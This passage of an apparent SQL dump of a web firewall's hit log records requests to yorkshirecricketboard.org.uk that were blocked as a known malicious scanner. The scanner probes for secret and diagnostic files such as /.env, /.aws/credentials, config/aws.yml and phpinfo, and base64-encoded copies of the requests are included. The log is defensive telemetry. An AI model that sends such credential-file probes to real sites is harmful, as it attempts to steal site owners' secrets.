User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L19wcm9maWxlci9waHBpbmZv\",\"category\":\"brute-force\",\"ssl\":1,\"fullRequest\":\"R0VUIC9fcHJvZmlsZXIvcGhwaW5mbyBIVFRQLzEuMQpVcGdyYWRlLUluc2VjdXJlLVJlcXVlc3RzOiAxCkNhY2hlLUNvbnRyb2w6IG1heC1hZ2U9MApBY2NlcHQtTGFuZ3VhZ2U6IGVuLVVTLGVuO3E9MC45LGZyO3E9MC44ClVzZXItQWdlbnQ6IE1vemxpbGEvNS4wIChMaW51eDsgQW5kcm9pZCA3LjA7IFNNLUc4OTJBIEJ1bGlkL05SRDkwTTsgd3YpIEFwcGxlV2ViS2l0LzUzNy4zNiAoS0hUTUwsIGxpa2UgR2Vja28pIFZlcnNpb24vNC4wIENocm9tZS82MC4wLjMxMTIuMTA3IE1vYmxpZSBTYWZhcmkvNTM3LjM2CkFjY2VwdDogdGV4dC9odG1sLGFwcGxpY2F0aW9uL3hodG1sK3htbCxhcHBsaWNhdGlvbi94bWw7cT0wLjksaW1hZ2Uvd2VicCxpbWFnZS9hcG5nLCovKjtxPTAuOApBY2NlcHQtRW5jb2Rpbmc6IGd6aXAsIGRlZmxhdGUKQ29ubmVjdGlvbjoga2VlcC1hbGl2ZQpIb3N0OiB3d3cueW9ya3NoaXJlY3JpY2tldGJvYXJkLm9yZy51awoK\"}'),(887,1630065806.912877,1630065806.795000,'\0\0\0\0\0\0\0\0\0\0�����a',0,403,0,0,0,'https://yorkshirecricketboard.org.uk/.env',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"Ly5lbnY=\",\"category\":\"brute-force\",\"ssl\":1,\"fullRequest\":\"R0VUIC8uZW52IEhUVFAvMS4xClVwZ3JhZGUtSW5zZWN1cmUtUmVxdWVzdHM6IDEKQ2FjaGUtQ29udHJvbDogbWF4LWFnZT0wCkFjY2VwdC1MYW5ndWFnZTogZW4tVVMsZW47cT0wLjksZnI7cT0wLjgKVXNlci1BZ2VudDogTW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzYKQWNjZXB0OiB0ZXh0L2h0bWwsYXBwbGljYXRpb24veGh0bWwreG1sLGFwcGxpY2F0aW9uL3htbDtxPTAuOSxpbWFnZS93ZWJwLGltYWdlL2FwbmcsKi8qO3E9MC44CkFjY2VwdC1FbmNvZGluZzogZ3ppcCwgZGVmbGF0ZQpDb25uZWN0aW9uOiBrZWVwLWFsaXZlCkhvc3Q6IHlvcmtzaGlyZWNyaWNrZXRib2FyZC5vcmcudWsKCg==\"}'),(888,1630065804.205890,1630065804.128900,'\0\0\0\0\0\0\0\0\0\0�����a',0,403,0,0,0,'https://yorkshirecricketboard.org.uk/config.js',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L2NvbmZpZy5qcw==\",\"category\":\"brute-force\",\"ssl\":1,\"fullRequest\":\"R0VUIC9jb25maWcuanMgSFRUUC8xLjEKVXBncmFkZS1JbnNlY3VyZS1SZXF1ZXN0czogMQpDYWNoZS1Db250cm9sOiBtYXgtYWdlPTAKQWNjZXB0LUxhbmd1YWdlOiBlbi1VUyxlbjtxPTAuOSxmcjtxPTAuOApVc2VyLUFnZW50OiBNb3psaWxhLzUuMCAoTGludXg7IEFuZHJvaWQgNy4wOyBTTS1HODkyQSBCdWxpZC9OUkQ5ME07IHd2KSBBcHBsZVdlYktpdC81MzcuMzYgKEtIVE1MLCBsaWtlIEdlY2tvKSBWZXJzaW9uLzQuMCBDaHJvbWUvNjAuMC4zMTEyLjEwNyBNb2JsaWUgU2FmYXJpLzUzNy4zNgpBY2NlcHQ6IHRleHQvaHRtbCxhcHBsaWNhdGlvbi94aHRtbCt4bWwsYXBwbGljYXRpb24veG1sO3E9MC45LGltYWdlL3dlYnAsaW1hZ2UvYXBuZywqLyo7cT0wLjgKQWNjZXB0LUVuY29kaW5nOiBnemlwLCBkZWZsYXRlCkNvbm5lY3Rpb246IGtlZXAtYWxpdmUKSG9zdDogeW9ya3NoaXJlY3JpY2tldGJvYXJkLm9yZy51awoK\"}'),(889,1630065801.995692,1630065801.920100,'\0\0\0\0\0\0\0\0\0\0�����a',0,403,0,0,0,'https://yorkshirecricketboard.org.uk/',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"Lw==\",\"category\":\"brute-force\",\"ssl\":1,\"fullRequest\":\"R0VUIC8gSFRUUC8xLjEKVXBncmFkZS1JbnNlY3VyZS1SZXF1ZXN0czogMQpDYWNoZS1Db250cm9sOiBtYXgtYWdlPTAKQWNjZXB0LUxhbmd1YWdlOiBlbi1VUyxlbjtxPTAuOSxmcjtxPTAuOApVc2VyLUFnZW50OiBNb3psaWxhLzUuMCAoTGludXg7IEFuZHJvaWQgNy4wOyBTTS1HODkyQSBCdWxpZC9OUkQ5ME07IHd2KSBBcHBsZVdlYktpdC81MzcuMzYgKEtIVE1MLCBsaWtlIEdlY2tvKSBWZXJzaW9uLzQuMCBDaHJvbWUvNjAuMC4zMTEyLjEwNyBNb2JsaWUgU2FmYXJpLzUzNy4zNgpBY2NlcHQ6IHRleHQvaHRtbCxhcHBsaWNhdGlvbi94aHRtbCt4bWwsYXBwbGljYXRpb24veG1sO3E9MC45LGltYWdlL3dlYnAsaW1hZ2UvYXBuZywqLyo7cT0wLjgKQWNjZXB0LUVuY29kaW5nOiBnemlwLCBkZWZsYXRlCkNvbm5lY3Rpb246IGtlZXAtYWxpdmUKSG9zdDogeW9ya3NoaXJlY3JpY2tldGJvYXJkLm9yZy51awoK\"}'),(890,1630065799.877593,1630065799.795800,'\0\0\0\0\0\0\0\0\0\0�����a',0,403,0,0,0,'https://yorkshirecricketboard.org.uk/config/aws.yml',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L2NvbmZpZy9hd3MueW1s\",\"category\":\"brute-force\",\"ssl\":1,\"fullRequest\":\"R0VUIC9jb25maWcvYXdzLnltbCBIVFRQLzEuMQpVcGdyYWRlLUluc2VjdXJlLVJlcXVlc3RzOiAxCkNhY2hlLUNvbnRyb2w6IG1heC1hZ2U9MApBY2NlcHQtTGFuZ3VhZ2U6IGVuLVVTLGVuO3E9MC45LGZyO3E9MC44ClVzZXItQWdlbnQ6IE1vemxpbGEvNS4wIChMaW51eDsgQW5kcm9pZCA3LjA7IFNNLUc4OTJBIEJ1bGlkL05SRDkwTTsgd3YpIEFwcGxlV2ViS2l0LzUzNy4zNiAoS0hUTUwsIGxpa2UgR2Vja28pIFZlcnNpb24vNC4wIENocm9tZS82MC4wLjMxMTIuMTA3IE1vYmxpZSBTYWZhcmkvNTM3LjM2CkFjY2VwdDogdGV4dC9odG1sLGFwcGxpY2F0aW9uL3hodG1sK3htbCxhcHBsaWNhdGlvbi94bWw7cT0wLjksaW1hZ2Uvd2VicCxpbWFnZS9hcG5nLCovKjtxPTAuOApBY2NlcHQtRW5jb2Rpbmc6IGd6aXAsIGRlZmxhdGUKQ29ubmVjdGlvbjoga2VlcC1hbGl2ZQpIb3N0OiB5b3Jrc2hpcmVjcmlja2V0Ym9hcmQub3JnLnVrCgo=\"}'),(891,1630065797.146670,1630065797.067300,'\0\0\0\0\0\0\0\0\0\0�����a',0,403,0,0,0,'https://yorkshirecricketboard.org.uk/',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"Lw==\",\"category\":\"brute-force\",\"ssl\":1,\"fullRequest\":\"R0VUIC8gSFRUUC8xLjEKVXBncmFkZS1JbnNlY3VyZS1SZXF1ZXN0czogMQpDYWNoZS1Db250cm9sOiBtYXgtYWdlPTAKQWNjZXB0LUxhbmd1YWdlOiBlbi1VUyxlbjtxPTAuOSxmcjtxPTAuOApVc2VyLUFnZW50OiBNb3psaWxhLzUuMCAoTGludXg7IEFuZHJvaWQgNy4wOyBTTS1HODkyQSBCdWxpZC9OUkQ5ME07IHd2KSBBcHBsZVdlYktpdC81MzcuMzYgKEtIVE1MLCBsaWtlIEdlY2tvKSBWZXJzaW9uLzQuMCBDaHJvbWUvNjAuMC4zMTEyLjEwNyBNb2JsaWUgU2FmYXJpLzUzNy4zNgpBY2NlcHQ6IHRleHQvaHRtbCxhcHBsaWNhdGlvbi94aHRtbCt4bWwsYXBwbGljYXRpb24veG1sO3E9MC45LGltYWdlL3dlYnAsaW1hZ2UvYXBuZywqLyo7cT0wLjgKQWNjZXB0LUVuY29kaW5nOiBnemlwLCBkZWZsYXRlCkNvbm5lY3Rpb246IGtlZXAtYWxpdmUKSG9zdDogeW9ya3NoaXJlY3JpY2tldGJvYXJkLm9yZy51awoK\"}'),(892,1630065794.661114,1630065794.562900,'\0\0\0\0\0\0\0\0\0\0�����a',0,403,0,0,0,'https://yorkshirecricketboard.org.uk/.aws/credentials',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"Ly5hd3MvY3JlZGVudGlhbHM=\",\"category\":\"brute-force\",\"ssl\":1,\"fullRequest\":\"R0VUIC8uYXdzL2NyZWRlbnRpYWxzIEhUVFAvMS4xClVwZ3JhZGUtSW5zZWN1cmUtUmVxdWVzdHM6IDEKQ2FjaGUtQ29udHJvbDogbWF4LWFnZT0wCkFjY2VwdC1MYW5ndWFnZTogZW4tVVMsZW47cT0wLjksZnI7cT0wLjgKVXNlci1BZ2VudDogTW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzYKQWNjZXB0OiB0ZXh0L2h0bWwsYXBwbGljYXRpb24veGh0bWwreG1sLGFwcGxpY2F0aW9uL3htbDtxPTAuOSxpbWFnZS93ZWJwLGltYWdlL2FwbmcsKi8qO3E9MC44CkFjY2VwdC1FbmNvZGluZzogZ3ppcCwgZGVmbGF0ZQpDb25uZWN0aW9uOiBrZWVwLWFsaXZlCkhvc3Q6IHlvcmtzaGlyZWNyaWNrZXRib2FyZC5vcmcudWsKCg==\"}'),(893,1630065791.447815,1630065791.368600,'\0\0\0\0\0\0\0\0\0\0�����a',0,403,0,0,0,'https://yorkshirecricketboard.org.uk/info.php',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L2luZm8ucGhw\",\"category\":\"brute-force\",\"ssl\":1,\"fullRequest\":\"R0VUIC9pbmZvLnBocCBIVFRQLzEuMQpVcGdyYWRlLUluc2VjdXJlLVJlcXVlc3RzOiAxCkNhY2hlLUNvbnRyb2w6IG1heC1hZ2U9MApBY2NlcHQtTGFuZ3VhZ2U6IGVuLVVTLGVuO3E9MC45LGZyO3E9MC44ClVzZXItQWdlbnQ6IE1vemxpbGEvNS4wIChMaW51eDsgQW5kcm9pZCA3LjA7IFNNLUc4OTJBIEJ1bGlkL05SRDkwTTsgd3YpIEFwcGxlV2ViS2l0LzUzNy4zNiAoS0hUTUwsIGxpa2UgR2Vja28pIFZlcnNpb24vNC4wIENocm9tZS82MC4wLjMxMTIuMTA3IE1vYmxpZSBTYWZhcmkvNTM3LjM2CkFjY2VwdDogdGV4dC9odG1sLGFwcGxpY2F0aW9uL3hodG1sK3htbCxhcHBsaWNhdGlvbi94bWw7cT0wLjksaW1hZ2Uvd2VicCxpbWFnZS9hcG5nLCovKjtxPTAuOApBY2NlcHQtRW5jb2Rpbmc6IGd6aXAsIGRlZmxhdGUKQ29ubmVjdGlvbjoga2VlcC1hbGl2ZQpIb3N0OiB5b3Jrc2hpcmVjcmlja2V0Ym9hcmQub3JnLnVrCgo=\"}'),(894,1630065789.377626,1630065788.973800,'\0\0\0\0\0\0\0\0\0\0�����a',0,403,0,0,0,'https://yorkshirecricketboard.org.uk/.env.bak',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"Ly5lbnYuYmFr\",\"category\":\"brute-force\",\"ssl\":1,\"fullRequest\":\"R0VUIC8uZW52LmJhayBIVFRQLzEuMQpVcGdyYWRlLUluc2VjdXJlLVJlcXVlc3RzOiAxCkNhY2hlLUNvbnRyb2w6IG1heC1hZ2U9MApBY2NlcHQtTGFuZ3VhZ2U6IGVuLVVTLGVuO3E9MC45LGZyO3E9MC44ClVzZXItQWdlbnQ6IE1vemxpbGEvNS4wIChMaW51eDsgQW5kcm9pZCA3LjA7IFNNLUc4OTJBIEJ1bGlkL05SRDkwTTsgd3YpIEFwcGxlV2ViS2l0LzUzNy4zNiAoS0hUTUwsIGxpa2UgR2Vja28pIFZlcnNpb24vNC4wIENocm9tZS82MC4wLjMxMTIuMTA3IE1vYmxpZSBTYWZhcmkvNTM3LjM2CkFjY2VwdDogdGV4dC9odG1sLGFwcGxpY2F0aW9uL3hodG1sK3htbCxhcHBsaWNhdGlvbi94bWw7cT0wLjksaW1hZ2Uvd2VicCxpbWFnZS9hcG5nLCovKjtxPTAuOApBY2NlcHQtRW5jb2Rpbmc6IGd6aXAsIGRlZmxhdGUKQ29ubmVjdGlvbjoga2VlcC1hbGl2ZQpIb3N0OiB5b3Jrc2hpcmVjcmlja2V0Ym9hcmQub3JnLnVrCgo=\"}'),(895,1630065786.894604,1630065786.807900,'\0\0\0\0\0\0\0\0\0\0�����a',0,403,0,0,0,'https://yorkshirecricketboard.org.uk/aws.yml',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L2F3cy55bWw=\",\"category\":\"brute-force\",\"ssl\":1,\"fullRequest\":\"R0VUIC9hd3MueW1sIEhUVFAvMS4xClVwZ3JhZGUtSW5zZWN1cmUtUmVxdWVzdHM6IDEKQ2FjaGUtQ29udHJvbDogbWF4LWFnZT0wCkFjY2VwdC1MYW5ndWFnZTogZW4tVVMsZW47cT0wLjksZnI7cT0wLjgKVXNlci1BZ2VudDogTW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzYKQWNjZXB0OiB0ZXh0L2h0bWwsYXBwbGljYXRpb24veGh0bWwreG1sLGFwcGxpY2F0aW9uL3htbDtxPTAuOSxpbWFnZS93ZWJwLGltYWdlL2FwbmcsKi8qO3E9MC44CkFjY2VwdC1FbmNvZGluZzogZ3ppcCwgZGVmbGF0ZQpDb25uZWN0aW9uOiBrZWVwLWFsaXZlCkhvc3Q6IHlvcmtzaGlyZWNyaWNrZXRib2FyZC5vcmcudWsKCg==\"}'),(896,1630065784.549973,1630065784.472100,'\0\0\0\0\0\0\0\0\0\0�����a',0,403,0,0,0,'https://yorkshirecricketboard.org.uk/phpinfo',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3BocGluZm8=\",\"category\":\"brute-force\",\"ssl\":1,\"fullRequest\":\"R0VUIC9waHBpbmZvIEhUVFAvMS4xClVwZ3JhZGUtSW5zZWN1cmUtUmVxdWVzdHM6IDEKQ2FjaGUtQ29udHJvbDogbWF4LWFnZT0wCkFjY2VwdC1MYW5ndWFnZTogZW4tVVMsZW47cT0wLjksZnI7cT0wLjgKVXNlci1BZ2VudDogTW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzYKQWNjZXB0OiB0ZXh0L2h0bWwsYXBwbGljYXRpb24veGh0bWwreG1sLGFwcGxpY2F0aW9uL3htbDtxPTAuOSxpbWFnZS93ZWJwLGltYWdlL2FwbmcsKi8qO3E9MC44CkFjY2VwdC1FbmNvZGluZzogZ3ppcCwgZGVmbGF0ZQpDb25uZWN0aW9uOiBrZWVwLWFsaXZlCkhvc3Q6IHlvcmtzaGlyZWNyaWNrZXRib2FyZC5vcmcudWsKCg==\"}'),(897,1630065782.586149,1630065782.503700,'\0\0\0\0\0\0\0\0\0\0�����a',0,403,0,0,0,'https://yorkshirecricketboard.org.uk/phpinfo.php',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3BocGluZm8ucGhw\",\"category\":\"brute-force\",\"ssl\":1,\"fullRequest\":\"R0VUIC9waHBpbmZvLnBocCBIVFRQLzEuMQpVcGdyYWRlLUluc2VjdXJlLVJlcXVlc3RzOiAxCkNhY2hlLUNvbnRyb2w6IG1heC1hZ2U9MApBY2NlcHQtTGFuZ3VhZ2U6IGVuLVVTLGVuO3E9MC45LGZyO3E9MC44ClVzZXItQWdlbnQ6IE1vemxpbGEvNS4wIChMaW51eDsgQW5kcm9pZCA3LjA7IFNNLUc4OTJBIEJ1bGlkL05SRDkwTTsgd3YpIEFwcGxlV2ViS2l0LzUzNy4zNiAoS0hUTUwsIGxpa2UgR2Vja28pIFZlcnNpb24vNC4wIENocm9tZS82MC4wLjMxMTIuMTA3IE1vYmxpZSBTYWZhcmkvNTM3LjM2CkFjY2VwdDogdGV4dC9odG1sLGFwcGxpY2F0aW9uL3hodG1sK3htbCxhcHBsaWNhdGlvbi94bWw7cT0wLjksaW1hZ2Uvd2VicCxpbWFnZS9hcG5nLCovKjtxPTAuOApBY2NlcHQtRW5jb2Rpbmc6IGd6aXAsIGRlZmxhdGUKQ29ubmVjdGlvbjoga2VlcC1hbGl2ZQpIb3N0OiB5b3Jrc2hpcmVjcmlja2V0Ym9hcmQub3JnLnVrCgo=\"}'),(898,1630065779.921992,1630065779.818800,'\0\0\0\0\0\0\0\0\0\0�����a',0,403,0,0,0,'https://yorkshirecricketboard.org.uk/_profiler/phpinfo',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L19wcm9maWxlci9waHBpbmZv\",\"category\":\"brute-force\",\"ssl\":1,\"fullRequest\":\"R0VUIC9fcHJvZmlsZXIvcGhwaW5mbyBIVFRQLzEuMQpVcGdyYWRlLUluc2VjdXJlLVJlcXVlc3RzOiAxCkNhY2hlLUNvbnRyb2w6IG1heC1hZ2U9MApBY2NlcHQtTGFuZ3VhZ2U6IGVuLVVTLGVuO3E9MC45LGZyO3E9MC44ClVzZXItQWdlbnQ6IE1vemxpbGEvNS4wIChMaW51eDsgQW5kcm9pZCA3LjA7IFNNLUc4OTJBIEJ1bGlkL05SRDkwTTsgd3YpIEFwcGxlV2ViS2l0LzUzNy4zNiAoS0hUTUwsIGxpa2UgR2Vja28pIFZlcnNpb24vNC4wIENocm9tZS82MC4wLjMxMTIuMTA3IE1vYmxpZSBTYWZhcmkvNTM3LjM2CkFjY2VwdDogdGV4dC9odG1sLGFwcGxpY2F0aW9uL3hodG1sK3htbCxhcHBsaWNhdGlvbi94bWw7cT0wLjksaW1hZ2Uvd2VicCxpbWFnZS9hcG5nLCovKjtxPTAuOApBY2NlcHQtRW5jb2Rpbmc6IGd6aXAsIGRlZmxhdGUKQ29ubmVjdGlvbjoga2VlcC1hbGl2ZQpIb3N0OiB5b3Jrc2hpcmVjcmlja2V0Ym9hcmQub3JnLnVrCgo=\"}'),(899,1630065428.079075,1630065428.002500,'\0\0\0\0\0\0\0\0\0\0�����a',0,403,0,0,0,'https://www.yorkshirecricketboard.org.uk/.env',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious 